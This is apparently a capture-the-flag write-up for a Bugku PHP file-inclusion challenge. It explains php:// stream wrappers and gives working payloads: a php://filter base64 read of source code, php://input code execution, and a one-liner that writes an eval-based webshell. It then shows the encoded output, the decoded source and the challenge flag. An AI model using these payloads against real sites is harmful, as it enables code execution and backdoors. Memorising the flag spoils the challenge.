0. Open the webpage and click the click me? no link
The URL bar shows: http://114.67.246.176:15077/index.php?file=show.php , there may be a file inclusion vulnerability
这里介绍一下:php://
protocol
-
condition:
allow_url_fopen
:off/onallow_url_include
:Onlyphp://input php://stdin php://memory php://temp
need to be on
- Action:
php://
accessing the respective input / output streams (I / O streams), often used in the CTF isphp://filter
andphp://input
,php://filter
for reading the source code,php://input
for performing php code. -
Description:
PHP provides some miscellaneous input/output (IO) streams, allowing access to PHP's input and output streams, standard input and output and error descriptors,
temporary file streams in memory, disk backup, and other read and write file resources that can be manipulated Filter.protocol effect php://input You can access the read-only stream of the original data of the request. Accessing the POST data
part in the POST request is invalid atenctype="multipart/form-data"
the timephp://input
.php://output The write-only data stream allows writing to the output buffer in the same way as print and echo. php://fd (>=5.3.6) Allow direct access to the specified file descriptor. For example, php://fd/3
file descriptor 3 is referenced.php://memory php://temp (>=5.1.0) A data stream similar to a file wrapper, allowing temporary data to be read and written. The only difference between the two is that php://memory
the data is always stored in the memory, butphp://temp
will be2MB
stored in a temporary file after the amount of memory reaches a predefined limit (the default is ). The location of temporary files is determinedsys_get_temp_dir()
in the same way.php://filter (>=5.0.0) A meta-wrapper designed for filtering applications when the data stream is opened. It is (all-in-one)
very useful for all- in- one file functions, similar toreadfile()
,file()
andfile_get_contents()
, there is no chance to apply other filters before the data stream content is read. -
php://filter
Detailed parameterThe parameters of the protocol will be passed on the path of the protocol, and multiple parameters can be passed on the same path. The specific reference is as follows:
php://filter parameters description resource=<data stream to be filtered> Required item. It specifies the data stream you want to filter. read=<filter for reading chain> Optional. One or more filter names can be set, with a pipe character (*\ *) separated. write=<write chain filter> Optional. One or more filter names can be set, with a pipe character (\ ) Separated. <; filter for two chains> Any filter list that is not prefixed with read= or write= will be applied to the read or write chain as appropriate. -
List of available filters (4 categories)
The main filter types are listed here. For details, please refer to: https://www.php.net/manual/zh/filters.php
String filter effect string.rot13 Equivalent to str_rot13()
rot13 transformstring.toupper Equivalent to strtoupper()
, turn capital lettersstring.tolower Equivalent to strtolower()
, turn lowercase lettersstring.strip_tags Equivalent to strip_tags()
removing html and PHP language tagsConversion filter effect convert.base64-encode & convert.base64-decode Equivalent to base64_encode()
sumbase64_decode()
, base64 encoding and decodingconvert.quoted-printable-encode & convert.quoted-printable-decode Encoding and decoding of quoted-printable strings and 8-bit strings Compression filter effect zlib.deflate & zlib.inflate A method of creating gzip-compatible files in the local file system, but does not generate header and trailer information for command-line tools such as gzip. Just compress and decompress the payload part of the data stream. bzip2.compress & bzip2.decompress Same as above, the method of creating bz2 compatible files in the local file system. Encryption filter effect mcrypt.* libmcrypt symmetric encryption algorithm mdecrypt. * libmcrypt symmetric decryption algorithm -
Example:
-
php://filter/read=convert.base64-encode/resource=[文件名]
Read the file source code (base64 encoding is required for php files)http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
-
php://input + [POST DATA]
Execute php codehttp://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php phpinfo(); ?>
If you have write permission, write a sentence of Trojan horse
http://127.0.0.1/include.php?file=php://input [POST DATA部分] <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
-
1、构造payload:http://114.67.246.176:15077/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
77u/PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LXdlYjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFnezU4ZGU2MTg1ODMxNDNiMzA4ZDZjMDc5YjQ5MDhlYTc3fQ0KPz4NCjwvaHRtbD4NCg==
相当于得到了源代码进行base64编码之后的结果,只需进行base64解码即可获取源代码
2、进行base64解码
<html>
<title>Bugku-web</title>
<?php
error_reporting(0);
if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag:flag{58de618583143b308d6c079b4908ea77}
?>
</html>